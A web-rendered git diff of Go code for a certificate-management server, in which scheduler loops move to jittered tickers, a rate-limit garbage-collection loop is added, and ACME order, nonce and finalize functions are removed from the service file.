defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -861,7 +909,7 @@ func (s *Scheduler) runNotificationRetry(ctx context.Context) {
|
|||||||
// no CRL/OCSP needed.
|
// no CRL/OCSP needed.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.shortLivedExpiryCheckInterval)
|
ticker := NewJitteredTicker(s.shortLivedExpiryCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -909,7 +957,7 @@ func (s *Scheduler) runShortLivedExpiryCheck(ctx context.Context) {
|
|||||||
// of configured network targets.
|
// of configured network targets.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
||||||
func (s *Scheduler) networkScanLoop(ctx context.Context) {
|
func (s *Scheduler) networkScanLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.networkScanInterval)
|
ticker := NewJitteredTicker(s.networkScanInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -956,7 +1004,7 @@ func (s *Scheduler) runNetworkScan(ctx context.Context) {
|
|||||||
// digestLoop runs every digestInterval and generates/sends certificate digest emails.
|
// digestLoop runs every digestInterval and generates/sends certificate digest emails.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous digest is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous digest is still running.
|
||||||
func (s *Scheduler) digestLoop(ctx context.Context) {
|
func (s *Scheduler) digestLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.digestInterval)
|
ticker := NewJitteredTicker(s.digestInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start for digest — wait for the first tick.
|
// Do NOT run immediately on start for digest — wait for the first tick.
|
||||||
@@ -999,7 +1047,7 @@ func (s *Scheduler) runDigest(ctx context.Context) {
|
|||||||
// resource-intensive. Wait for the first tick.
|
// resource-intensive. Wait for the first tick.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) healthCheckLoop(ctx context.Context) {
|
func (s *Scheduler) healthCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.healthCheckInterval)
|
ticker := NewJitteredTicker(s.healthCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start for health checks — wait for the first tick.
|
// Do NOT run immediately on start for health checks — wait for the first tick.
|
||||||
@@ -1041,7 +1089,7 @@ func (s *Scheduler) runHealthCheck(ctx context.Context) {
|
|||||||
// Runs immediately on start, then on each tick. Same idempotency pattern as networkScanLoop.
|
// Runs immediately on start, then on each tick. Same idempotency pattern as networkScanLoop.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
||||||
func (s *Scheduler) cloudDiscoveryLoop(ctx context.Context) {
|
func (s *Scheduler) cloudDiscoveryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.cloudDiscoveryInterval)
|
ticker := NewJitteredTicker(s.cloudDiscoveryInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -1121,7 +1169,7 @@ func (s *Scheduler) WaitForCompletion(timeout time.Duration) error {
|
|||||||
//
|
//
|
||||||
// Bundle CRL/OCSP-Responder Phase 3.
|
// Bundle CRL/OCSP-Responder Phase 3.
|
||||||
func (s *Scheduler) crlGenerationLoop(ctx context.Context) {
|
func (s *Scheduler) crlGenerationLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.crlGenerationInterval)
|
ticker := NewJitteredTicker(s.crlGenerationInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start. CRLs are typically valid for
|
// Do NOT run immediately on start. CRLs are typically valid for
|
||||||
@@ -1171,7 +1219,7 @@ var ErrSchedulerShutdownTimeout = errors.New("scheduler graceful shutdown timeou
|
|||||||
// sync.WaitGroup tracks the in-flight goroutine for graceful shutdown.
|
// sync.WaitGroup tracks the in-flight goroutine for graceful shutdown.
|
||||||
// Phase 5.
|
// Phase 5.
|
||||||
func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.acmeGCInterval)
|
ticker := NewJitteredTicker(s.acmeGCInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
for {
|
for {
|
||||||
@@ -1212,7 +1260,7 @@ func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
|||||||
// file: a stuck Postgres can't block the next tick, and concurrent
|
// file: a stuck Postgres can't block the next tick, and concurrent
|
||||||
// sweeps are skipped not queued.
|
// sweeps are skipped not queued.
|
||||||
func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.sessionGCInterval)
|
ticker := NewJitteredTicker(s.sessionGCInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
for {
|
for {
|
||||||
@@ -1247,3 +1295,45 @@ func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// rateLimitGCLoop runs every rateLimitGCInterval and invokes
|
||||||
|
// RateLimitGarbageCollector.GarbageCollect, which sweeps stale rows
|
||||||
|
// from the rate_limit_buckets table introduced in Phase 13 Sprint
|
||||||
|
// 13.2's migration 000046.
|
||||||
|
//
|
||||||
|
// Wired only when CERTCTL_RATE_LIMIT_BACKEND=postgres (the in-memory
|
||||||
|
// backend's prune-on-Allow path keeps buckets short-lived without a
|
||||||
|
// separate sweep — cmd/server/main.go skips SetRateLimitGarbageCollector
|
||||||
|
// for that case so this loop never launches).
|
||||||
|
//
|
||||||
|
// Phase 13 Sprint 13.3 closure. The atomic.Bool guard + per-tick
|
||||||
|
// context.WithTimeout match every other GC loop's pattern.
|
||||||
|
func (s *Scheduler) rateLimitGCLoop(ctx context.Context) {
|
||||||
|
ticker := NewJitteredTicker(s.rateLimitGCInterval, DefaultSchedulerJitter)
|
||||||
|
defer ticker.Stop()
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
return
|
||||||
|
case <-ticker.C:
|
||||||
|
if !s.rateLimitGCRunning.CompareAndSwap(false, true) {
|
||||||
|
s.logger.Warn("rate-limit GC sweep still running, skipping tick")
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
s.wg.Add(1)
|
||||||
|
go func() {
|
||||||
|
defer s.wg.Done()
|
||||||
|
defer s.rateLimitGCRunning.Store(false)
|
||||||
|
// 1-minute timeout matches acme + session GC loops.
|
||||||
|
opCtx, cancel := context.WithTimeout(ctx, time.Minute)
|
||||||
|
defer cancel()
|
||||||
|
if n, err := s.rateLimitGC.GarbageCollect(opCtx); err != nil {
|
||||||
|
s.logger.Warn("rate-limit gc sweep failed (next tick will retry)", "error", err)
|
||||||
|
} else if n > 0 {
|
||||||
|
s.logger.Debug("rate-limit gc swept stale buckets", "rows", n)
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
+6
-809
@@ -5,7 +5,6 @@ package service
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
cryptorand "crypto/rand"
|
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"errors"
|
"errors"
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -420,28 +419,6 @@ func (s *ACMEService) BuildDirectory(ctx context.Context, profileID, baseURL str
|
|||||||
return dir, nil
|
return dir, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// IssueNonce generates a fresh ACME nonce, persists it with the
|
|
||||||
// configured TTL, and returns the encoded string for the
|
|
||||||
// Replay-Nonce header.
|
|
||||||
//
|
|
||||||
// RFC 8555 §6.5: every successful ACME response carries a
|
|
||||||
// Replay-Nonce. Phase 1a wires this via the directory + new-nonce
|
|
||||||
// handlers; Phase 1b extends with new-account + account/<id> POST
|
|
||||||
// responses (the JWS-authenticated paths).
|
|
||||||
func (s *ACMEService) IssueNonce(ctx context.Context) (string, error) {
|
|
||||||
nonce, err := acme.GenerateNonce()
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: generate nonce: %w", err)
|
|
||||||
}
|
|
||||||
if err := s.repo.IssueNonce(ctx, nonce, s.cfg.NonceTTL); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: persist nonce: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceTotal)
|
|
||||||
return nonce, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// resolveProfile applies the default-profile fallback and confirms the
|
// resolveProfile applies the default-profile fallback and confirms the
|
||||||
// profile exists. Returns the resolved (canonical) profileID on
|
// profile exists. Returns the resolved (canonical) profileID on
|
||||||
// success. Centralizing the resolution here keeps every Phase
|
// success. Centralizing the resolution here keeps every Phase
|
||||||
@@ -814,457 +791,13 @@ func (s *ACMEService) DeactivateAccount(ctx context.Context, accountID string) (
|
|||||||
return acct, nil
|
return acct, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// --- Phase 2 — orders + authz + finalize + cert download ---------------
|
|
||||||
|
|
||||||
// CreateOrder validates a new-order request against the bound profile
|
|
||||||
// and persists the order + per-identifier authz + per-authz challenge
|
|
||||||
// rows in one WithinTx. Returns the created order on success.
|
|
||||||
//
|
|
||||||
// Auth-mode dispatch:
|
|
||||||
// - trust_authenticated (default): order goes immediately to status=ready,
|
|
||||||
// each authz immediately to status=valid (no challenge validation
|
|
||||||
// required); a single placeholder http-01 challenge per authz is
|
|
||||||
// persisted with status=valid for RFC 8555 compliance (the spec
|
|
||||||
// requires challenges on every authz).
|
|
||||||
// - challenge: order stays at status=pending, authzs at status=pending,
|
|
||||||
// challenges at status=pending, until Phase 3's validators run.
|
|
||||||
func (s *ACMEService) CreateOrder(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, profileID string,
|
|
||||||
identifiers []domain.ACMEIdentifier,
|
|
||||||
notBefore, notAfter *time.Time,
|
|
||||||
) (*domain.ACMEOrder, error) {
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: new-order requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
// Phase 5 — per-account orders/hour cap. Hits return rateLimited
|
|
||||||
// (RFC 8555 §6.7) before any DB work. Counter is in-memory; restart
|
|
||||||
// wipes (eventual-consistency caps are acceptable).
|
|
||||||
if s.rateLimiter != nil && s.cfg.RateLimitOrdersPerHour > 0 {
|
|
||||||
if !s.rateLimiter.Allow(acme.ActionNewOrder, accountID, s.cfg.RateLimitOrdersPerHour) {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, ErrACMERateLimited
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Phase 5 — concurrent-orders cap. We count
|
|
||||||
// pending/ready/processing orders for this account; if at-or-over
|
|
||||||
// the cap, reject. This is a DB read (no FOR UPDATE), so two
|
|
||||||
// requests racing under the threshold can both succeed and push
|
|
||||||
// the account one over — accepted as eventual-consistency.
|
|
||||||
if s.cfg.RateLimitConcurrentOrders > 0 {
|
|
||||||
count, cerr := s.repo.CountActiveOrdersByAccount(ctx, accountID)
|
|
||||||
if cerr == nil && count >= s.cfg.RateLimitConcurrentOrders {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, ErrACMEConcurrentOrdersExceeded
|
|
||||||
}
|
|
||||||
}
|
|
||||||
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
|
||||||
}
|
|
||||||
authMode := profile.ACMEAuthMode
|
|
||||||
if authMode == "" {
|
|
||||||
authMode = string(s.cfg.DefaultAuthMode)
|
|
||||||
}
|
|
||||||
if authMode == "" {
|
|
||||||
authMode = "trust_authenticated"
|
|
||||||
}
|
|
||||||
if authMode != "trust_authenticated" && authMode != "challenge" {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("%w: %q", ErrACMEUnsupportedAuthMode, authMode)
|
|
||||||
}
|
|
||||||
|
|
||||||
now := time.Now().UTC()
|
|
||||||
orderTTL := s.cfg.OrderTTL
|
|
||||||
if orderTTL <= 0 {
|
|
||||||
orderTTL = 24 * time.Hour
|
|
||||||
}
|
|
||||||
authzTTL := s.cfg.AuthzTTL
|
|
||||||
if authzTTL <= 0 {
|
|
||||||
authzTTL = 24 * time.Hour
|
|
||||||
}
|
|
||||||
|
|
||||||
// In trust_authenticated mode, the order goes straight to `ready`
|
|
||||||
// (RFC 8555 §7.1.6: ready means all authzs valid, awaiting CSR).
|
|
||||||
// In challenge mode, the order stays `pending` until challenges
|
|
||||||
// validate.
|
|
||||||
orderStatus := domain.ACMEOrderStatusPending
|
|
||||||
authzStatus := domain.ACMEAuthzStatusPending
|
|
||||||
challengeStatus := domain.ACMEChallengeStatusPending
|
|
||||||
if authMode == "trust_authenticated" {
|
|
||||||
orderStatus = domain.ACMEOrderStatusReady
|
|
||||||
authzStatus = domain.ACMEAuthzStatusValid
|
|
||||||
challengeStatus = domain.ACMEChallengeStatusValid
|
|
||||||
}
|
|
||||||
|
|
||||||
order := &domain.ACMEOrder{
|
|
||||||
OrderID: "acme-ord-" + randIDSuffix(),
|
|
||||||
AccountID: accountID,
|
|
||||||
Identifiers: identifiers,
|
|
||||||
Status: orderStatus,
|
|
||||||
ExpiresAt: now.Add(orderTTL),
|
|
||||||
NotBefore: notBefore,
|
|
||||||
NotAfter: notAfter,
|
|
||||||
CreatedAt: now,
|
|
||||||
UpdatedAt: now,
|
|
||||||
}
|
|
||||||
|
|
||||||
auditDetails := map[string]interface{}{
|
|
||||||
"account_id": accountID,
|
|
||||||
"profile_id": resolvedProfileID,
|
|
||||||
"auth_mode": authMode,
|
|
||||||
"identifier_n": len(identifiers),
|
|
||||||
"identifiers": identifierStrings(identifiers),
|
|
||||||
}
|
|
||||||
|
|
||||||
err = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.CreateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return fmt.Errorf("acme: create order: %w", err)
|
|
||||||
}
|
|
||||||
// Per-identifier authz + 1 placeholder challenge per authz.
|
|
||||||
for _, id := range identifiers {
|
|
||||||
authz := &domain.ACMEAuthorization{
|
|
||||||
AuthzID: "acme-authz-" + randIDSuffix(),
|
|
||||||
OrderID: order.OrderID,
|
|
||||||
Identifier: id,
|
|
||||||
Status: authzStatus,
|
|
||||||
ExpiresAt: now.Add(authzTTL),
|
|
||||||
Wildcard: strings.HasPrefix(id.Value, "*."),
|
|
||||||
CreatedAt: now,
|
|
||||||
UpdatedAt: now,
|
|
||||||
}
|
|
||||||
if err := s.repo.CreateAuthzWithTx(ctx, q, authz); err != nil {
|
|
||||||
return fmt.Errorf("acme: create authz: %w", err)
|
|
||||||
}
|
|
||||||
// RFC 8555 §8: every authz needs at least one challenge
|
|
||||||
// row. Phase 2 emits a single http-01 placeholder; Phase 3
|
|
||||||
// will fan out to all 3 challenge types under challenge mode.
|
|
||||||
ch := &domain.ACMEChallenge{
|
|
||||||
ChallengeID: "acme-chall-" + randIDSuffix(),
|
|
||||||
AuthzID: authz.AuthzID,
|
|
||||||
Type: domain.ACMEChallengeTypeHTTP01,
|
|
||||||
Status: challengeStatus,
|
|
||||||
Token: randIDSuffix(),
|
|
||||||
CreatedAt: now,
|
|
||||||
}
|
|
||||||
if challengeStatus == domain.ACMEChallengeStatusValid {
|
|
||||||
validatedAt := now
|
|
||||||
ch.ValidatedAt = &validatedAt
|
|
||||||
}
|
|
||||||
if err := s.repo.CreateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return fmt.Errorf("acme: create challenge: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(
|
|
||||||
ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID),
|
|
||||||
domain.ActorTypeUser,
|
|
||||||
"acme_order_created",
|
|
||||||
"acme_order",
|
|
||||||
order.OrderID,
|
|
||||||
auditDetails,
|
|
||||||
)
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderTotal)
|
|
||||||
return order, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupOrder returns an order by ID, asserting the requesting
|
|
||||||
// account owns it. ErrACMEOrderUnauthorized when account_id mismatches.
|
|
||||||
func (s *ACMEService) LookupOrder(ctx context.Context, orderID, accountID string) (*domain.ACMEOrder, error) {
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, orderID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEOrderNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup order: %w", err)
|
|
||||||
}
|
|
||||||
if order.AccountID != accountID {
|
|
||||||
return nil, ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
return order, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupAuthz returns an authz by ID. Authz rows aren't account-scoped
|
|
||||||
// directly; the handler asserts via the parent order if needed.
|
|
||||||
func (s *ACMEService) LookupAuthz(ctx context.Context, authzID string) (*domain.ACMEAuthorization, error) {
|
|
||||||
authz, err := s.repo.GetAuthzByID(ctx, authzID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEAuthzNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup authz: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.AuthzReadTotal)
|
|
||||||
return authz, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// ListAuthzsByOrder returns the per-order authz rows. Used by
|
|
||||||
// MarshalOrder to compute the authorizations URL list.
|
|
||||||
func (s *ACMEService) ListAuthzsByOrder(ctx context.Context, orderID string) ([]*domain.ACMEAuthorization, error) {
|
|
||||||
return s.repo.ListAuthzsByOrder(ctx, orderID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// FinalizeOrderResult bundles the post-finalize state the handler
|
|
||||||
// needs: the updated order + the cert ID for the cert-download URL.
|
|
||||||
type FinalizeOrderResult struct {
|
|
||||||
Order *domain.ACMEOrder
|
|
||||||
CertID string
|
|
||||||
}
|
|
||||||
|
|
||||||
// FinalizeOrder consumes a CSR, asserts it matches the order's
|
|
||||||
// identifiers, issues via the IssuerRegistry's per-profile connector,
|
|
||||||
// persists the managed_certificates row + version + audit, and
|
|
||||||
// transitions the order to status=valid with certificate_id set.
|
|
||||||
//
|
|
||||||
// Atomicity boundary (documented in the master prompt):
|
|
||||||
// - Step A (this function's own WithinTx): order status pending →
|
|
||||||
// processing + audit row.
|
|
||||||
// - Step B (CertificateService.Create): managed_certificates row +
|
|
||||||
// audit row in its own WithinTx.
|
|
||||||
// - Step C (this function's own WithinTx): certificate_versions row
|
|
||||||
// - order status processing → valid + certificate_id + csr_pem +
|
|
||||||
// audit row.
|
|
||||||
//
|
|
||||||
// The window between Step B and Step C can leave a managed_certificates
|
|
||||||
// row whose order is still in `processing`. Phase 5's GC scheduler
|
|
||||||
// reconciles. Documented in the project's ACME-server design notes + the
|
|
||||||
// service file's design notes.
|
|
||||||
func (s *ACMEService) FinalizeOrder(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, orderID, profileID string,
|
|
||||||
csr *x509.CertificateRequest,
|
|
||||||
csrPEM string,
|
|
||||||
) (*FinalizeOrderResult, error) {
|
|
||||||
if s.certService == nil || s.certRepo == nil || s.issuerRegistry == nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, ErrACMEFinalizeUnconfigured
|
|
||||||
}
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: finalize requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
|
|
||||||
order, err := s.LookupOrder(ctx, orderID, accountID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
if order.Status != domain.ACMEOrderStatusReady && order.Status != domain.ACMEOrderStatusProcessing {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("%w: status=%s", ErrACMEOrderNotReady, order.Status)
|
|
||||||
}
|
|
||||||
// Idempotent re-finalize (RFC 8555 §7.4): if the order is already
|
|
||||||
// valid, return the existing result.
|
|
||||||
if order.Status == domain.ACMEOrderStatusValid && order.CertificateID != "" {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
|
||||||
return &FinalizeOrderResult{Order: order, CertID: order.CertificateID}, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Validate CSR matches order identifiers.
|
|
||||||
if p := acme.CSRMatchesIdentifiers(csr, order.Identifiers); p != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
// Persist the failure on the order for client visibility.
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{Type: p.Type, Detail: p.Detail, Status: p.Status}
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
|
||||||
})
|
|
||||||
return nil, fmt.Errorf("acme: csr mismatch: %s", p.Detail)
|
|
||||||
}
|
|
||||||
|
|
||||||
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step A: mark order processing.
|
|
||||||
order.Status = domain.ACMEOrderStatusProcessing
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_order_processing", "acme_order", order.OrderID,
|
|
||||||
map[string]interface{}{"profile_id": resolvedProfileID})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step B: issue the cert via the per-issuer connector + persist
|
|
||||||
// the managed_certificates row.
|
|
||||||
commonName := csr.Subject.CommonName
|
|
||||||
if commonName == "" && len(order.Identifiers) > 0 {
|
|
||||||
commonName = order.Identifiers[0].Value
|
|
||||||
}
|
|
||||||
sans := make([]string, 0, len(order.Identifiers))
|
|
||||||
for _, id := range order.Identifiers {
|
|
||||||
if id.Type == "dns" {
|
|
||||||
sans = append(sans, id.Value)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Resolve the bound issuer. Profile carries no IssuerID column
|
|
||||||
// (issuer is per-issuance per certctl architecture), so we'd
|
|
||||||
// normally get it from the order context. For Phase 2 we use the
|
|
||||||
// configured default issuer-id for the first registered connector.
|
|
||||||
// Operators with multiple profiles + multiple issuers will refine
|
|
||||||
// this in a follow-up.
|
|
||||||
issuerID, conn, ok := s.firstAvailableIssuer()
|
|
||||||
if !ok {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: no issuer available in registry")
|
|
||||||
}
|
|
||||||
maxTTL := profile.MaxTTLSeconds
|
|
||||||
mustStaple := profile.MustStaple
|
|
||||||
ekus := profile.AllowedEKUs
|
|
||||||
if len(ekus) == 0 {
|
|
||||||
ekus = domain.DefaultEKUs()
|
|
||||||
}
|
|
||||||
issuance, err := conn.IssueCertificate(ctx, commonName, sans, csrPEM, ekus, maxTTL, mustStaple)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
// Persist the failure on the order.
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{
|
|
||||||
Type: "urn:ietf:params:acme:error:serverInternal",
|
|
||||||
Detail: "issuer rejected the CSR",
|
|
||||||
Status: 500,
|
|
||||||
}
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
|
||||||
})
|
|
||||||
return nil, fmt.Errorf("acme: issuer issuance: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
cert := &domain.ManagedCertificate{
|
|
||||||
ID: "mc-acme-" + randIDSuffix(),
|
|
||||||
Name: fmt.Sprintf("acme-%s", order.OrderID),
|
|
||||||
CommonName: commonName,
|
|
||||||
SANs: sans,
|
|
||||||
IssuerID: issuerID,
|
|
||||||
CertificateProfileID: profile.ID,
|
|
||||||
Status: domain.CertificateStatusActive,
|
|
||||||
ExpiresAt: issuance.NotAfter,
|
|
||||||
Source: domain.CertificateSourceACME,
|
|
||||||
}
|
|
||||||
actor := fmt.Sprintf("acme:%s", accountID)
|
|
||||||
if err := s.certService.Create(ctx, cert, actor); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: cert insert: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step C: persist the certificate version + transition order to
|
|
||||||
// valid in one WithinTx.
|
|
||||||
version := &domain.CertificateVersion{
|
|
||||||
CertificateID: cert.ID,
|
|
||||||
SerialNumber: issuance.Serial,
|
|
||||||
NotBefore: issuance.NotBefore,
|
|
||||||
NotAfter: issuance.NotAfter,
|
|
||||||
PEMChain: issuance.CertPEM + issuance.ChainPEM,
|
|
||||||
CSRPEM: csrPEM,
|
|
||||||
}
|
|
||||||
order.Status = domain.ACMEOrderStatusValid
|
|
||||||
order.CSRPEM = csrPEM
|
|
||||||
order.CertificateID = cert.ID
|
|
||||||
order.Error = nil
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.certRepo.CreateVersionWithTx(ctx, q, version); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q, actor, domain.ActorTypeUser,
|
|
||||||
"acme_order_finalized", "acme_order", order.OrderID,
|
|
||||||
map[string]interface{}{
|
|
||||||
"profile_id": resolvedProfileID,
|
|
||||||
"certificate_id": cert.ID,
|
|
||||||
"serial": issuance.Serial,
|
|
||||||
})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
|
||||||
